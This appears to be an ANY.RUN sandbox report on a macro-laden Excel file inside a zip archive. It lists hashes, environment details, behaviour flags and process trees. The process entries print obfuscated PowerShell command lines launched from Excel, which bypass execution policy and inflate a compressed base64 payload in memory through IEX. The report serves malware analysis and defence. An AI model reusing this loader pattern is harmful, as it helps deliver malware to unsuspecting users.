General Info

File name

Documento_030645_FT_20190415_0009002_.xls.zip

Full analysis
https://app.any.run/tasks/86c32d56-81b7-41cd-b2c6-a4a6bc2647eb
Verdict
Malicious activity
Analysis date
4/15/2019, 09:23:24
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

ce58be61489c36793de66903bb1c5bd7

SHA1

6725e3077eb5e9259fb302169f39f0f70ff4e963

SHA256

a04aa942f16874466a7ec9b8ab2c0428fdcf455dc3db2d332afba58d13e1c37b

SSDEEP

768:9toKxq+4StY7p0+1x70L8QTD8kP6GpRFTvUpbbXuEjEs7vJNjNoP:jxqItcO8qAQFTvUBbXHj7Ju

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • EXCEL.EXE (PID: 1092)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 1092)
Executes PowerShell scripts
  • powershell.exe (PID: 1348)
Creates files in the user directory
  • powershell.exe (PID: 1348)
  • powershell.exe (PID: 2340)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 2672)
Application launched itself
  • rundll32.exe (PID: 2672)
  • powershell.exe (PID: 1348)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 1092)
Creates files in the user directory
  • EXCEL.EXE (PID: 1092)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2107:09:22 18:42:24
ZipCRC:
0x47c51c89
ZipCompressedSize:
44431
ZipUncompressedSize:
77312
ZipFileName:
Documento_030645_FT_20190415_0009002_.xls

Processes

Total processes
41
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

start winrar.exe no specs rundll32.exe no specs rundll32.exe no specs mctadmin.exe no specs excel.exe no specs powershell.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

PID
3044
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\xlicons.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2672
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\kbdit.dll

PID
3296
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdit.dll

PID
3584
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1092
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\winmm.dll

PID
1348
CMD
powershell -w 1 -nOPROF -NONinTe -exEcUtI BYPass -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString()('('' & ((gv ''''*MDr*'''').naMe[3,11,2]-Join'''''''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''''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'''' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )'')')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\netutils.dll

PID
2340
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX "(' & ((gv ''*MDr*'').naMe[3,11,2]-Join'''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''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'' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\c9b7480fe8ed9de8f2728e543bd52cb2\microsoft.powershell.graphicalhost.ni.dll
c:\windows\assembly\gac_msil\uiautomationtypes\3.0.0.0__31bf3856ad364e35\uiautomationtypes.dll
c:\windows\assembly\gac_msil\uiautomationprovider\3.0.0.0__31bf3856ad364e35\uiautomationprovider.dll
c:\windows\assembly\gac_msil\windowsbase\3.0.0.0__31bf3856ad364e35\windowsbase.dll
